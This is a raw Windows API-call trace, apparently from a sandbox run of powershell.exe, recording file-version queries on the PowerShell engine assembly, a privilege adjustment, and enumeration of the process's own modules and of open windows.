	[0259.170] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12d930 | out: lpFileInformation=0x12d930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0259.171] SetErrorMode (uMode=0x1) returned 0x1
	[0259.174] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dba0 | out: lpdwHandle=0x12dba0) returned 0x94c
	[0259.175] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bc72d8 | out: lpData=0x2bc72d8) returned 1
	[0259.177] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db18, puLen=0x12db10 | out: lplpBuffer=0x12db18*=0x2bc7374, puLen=0x12db10) returned 1
	[0259.179] lstrlenW (lpString="䅁") returned 1
	[0259.203] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc7450, puLen=0x12da80) returned 1
	[0259.203] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0259.205] CoTaskMemAlloc (cb=0x2e) returned 0x36fc30
	[0259.205] lstrcpyW (in: lpString1=0x36fc30, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0259.206] CoTaskMemFree (pv=0x36fc30) 
	[0259.207] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc74a4, puLen=0x12da80) returned 1
	[0259.207] lstrlenW (lpString="System.Management.Automation") returned 28
	[0259.207] CoTaskMemAlloc (cb=0x3c) returned 0x324c60
	[0259.207] lstrcpyW (in: lpString1=0x324c60, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0259.207] CoTaskMemFree (pv=0x324c60) 
	[0259.207] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc7500, puLen=0x12da80) returned 1
	[0259.207] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0259.207] CoTaskMemAlloc (cb=0x20) returned 0x3a6810
	[0259.207] lstrcpyW (in: lpString1=0x3a6810, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0259.207] CoTaskMemFree (pv=0x3a6810) 
	[0259.207] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc7540, puLen=0x12da80) returned 1
	[0259.207] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0259.207] CoTaskMemAlloc (cb=0x44) returned 0x324c60
	[0259.207] lstrcpyW (in: lpString1=0x324c60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0259.207] CoTaskMemFree (pv=0x324c60) 
	[0259.207] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc75a8, puLen=0x12da80) returned 1
	[0259.207] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0259.207] CoTaskMemAlloc (cb=0x76) returned 0x3543d0
	[0259.207] lstrcpyW (in: lpString1=0x3543d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0259.207] CoTaskMemFree (pv=0x3543d0) 
	[0259.207] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc7644, puLen=0x12da80) returned 1
	[0259.207] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0259.207] CoTaskMemAlloc (cb=0x44) returned 0x324c60
	[0259.207] lstrcpyW (in: lpString1=0x324c60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0259.207] CoTaskMemFree (pv=0x324c60) 
	[0259.207] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc76a8, puLen=0x12da80) returned 1
	[0259.207] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0259.207] CoTaskMemAlloc (cb=0x58) returned 0x376990
	[0259.207] lstrcpyW (in: lpString1=0x376990, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0259.207] CoTaskMemFree (pv=0x376990) 
	[0259.207] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc7724, puLen=0x12da80) returned 1
	[0259.208] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0259.208] CoTaskMemAlloc (cb=0x20) returned 0x3a6810
	[0259.208] lstrcpyW (in: lpString1=0x3a6810, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0259.208] CoTaskMemFree (pv=0x3a6810) 
	[0259.208] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2bc73cc, puLen=0x12da80) returned 1
	[0259.208] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0259.208] CoTaskMemAlloc (cb=0x66) returned 0x3a4fa0
	[0259.208] lstrcpyW (in: lpString1=0x3a4fa0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0259.208] CoTaskMemFree (pv=0x3a4fa0) 
	[0259.208] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x0, puLen=0x12da80) returned 0
	[0259.208] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x0, puLen=0x12da80) returned 0
	[0259.208] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x0, puLen=0x12da80) returned 0
	[0259.208] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12da58, puLen=0x12da50 | out: lplpBuffer=0x12da58*=0x2bc7374, puLen=0x12da50) returned 1
	[0259.209] CoTaskMemAlloc (cb=0x204) returned 0x35b3f0
	[0259.209] VerLanguageNameW (in: wLang=0x0, szLang=0x35b3f0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0259.210] CoTaskMemFree (pv=0x35b3f0) 
	[0259.210] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\", lplpBuffer=0x12daa8, puLen=0x12daa0 | out: lplpBuffer=0x12daa8*=0x2bc7300, puLen=0x12daa0) returned 1
	[0259.667] GetCurrentProcessId () returned 0x920
	[0259.678] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12c9d0 | out: lpLuid=0x12c9d0*(LowPart=0x14, HighPart=0)) returned 1
	[0259.681] GetCurrentProcess () returned 0xffffffffffffffff
	[0259.681] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12c9f0 | out: TokenHandle=0x12c9f0*=0x2f0) returned 1
	[0259.682] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2bcab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0259.684] CloseHandle (hObject=0x2f0) returned 1
	[0259.687] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x2f0
	[0259.695] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2bcabb8, cb=0x200, lpcbNeeded=0x12da08 | out: lphModule=0x2bcabb8, lpcbNeeded=0x12da08) returned 1
	[0259.698] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f370000, lpmodinfo=0x2bcae28, cb=0x18 | out: lpmodinfo=0x2bcae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0259.699] CoTaskMemAlloc (cb=0x804) returned 0x3ae480
	[0259.699] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f370000, lpBaseName=0x3ae480, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0259.699] CoTaskMemFree (pv=0x3ae480) 
	[0259.700] CoTaskMemAlloc (cb=0x804) returned 0x3ae480
	[0259.700] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f370000, lpFilename=0x3ae480, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0259.700] CoTaskMemFree (pv=0x3ae480) 
	[0259.701] CloseHandle (hObject=0x2f0) returned 1
	[0259.708] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x920) returned 0x2f0
	[0259.708] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x12db38 | out: lpExitCode=0x12db38*=0x103) returned 1
	[0260.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bcb088, Length=0x20000, ResultLength=0x12db00 | out: SystemInformation=0x12bcb088, ResultLength=0x12db00*=0x10f90) returned 0x0
	[0260.059] EnumWindows (lpEnumFunc=0x29e66ac, lParam=0x0) returned 1
	[0261.009] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0261.958] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x558
	[0262.301] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.301] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x538
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x778
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x778
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.302] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x460
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xa6c
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xa68
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x9f8
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xa04
	[0262.303] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x924
	[0262.304] GetWindow (hWnd=0x1020a, uCmd=0x4) returned 0x0
	[0262.304] IsWindowVisible (hWnd=0x1020a) returned 0
	[0262.304] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x8dc
	[0262.304] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x7dc
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x768
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x764
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x820
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x810
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x794
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x83c
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x7ac
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xb44
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xb5c
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x838
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.305] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x818
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x5b8
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x494
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x1ec
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x440
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x7e8
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x730
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x2c8
	[0262.306] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x31c
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x330
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x128
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x5c8
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x6f8
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x358
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x73c
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xb0
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x250
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x240
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x790
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x61c
	[0262.307] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x540
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x538
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x568
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x538
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x568
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x538
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x540
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x540
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x510
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x57c
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x460
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x554
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.308] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x528
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x79c
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4e0
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x460
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x460
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x44c
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x778
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x460
	[0262.309] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x558
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4d0
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x7e0
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xa74
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x694
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xa28
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x9b0
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x8d8
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x940
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x93c
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4ec
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x150
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x720
	[0262.310] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x3c4
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x7d4
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x6c8
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xb54
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xb54
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xb5c
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x838
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x818
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x5b8
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x494
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x1ec
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x440
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x7e8
	[0262.311] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x730
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x2c8
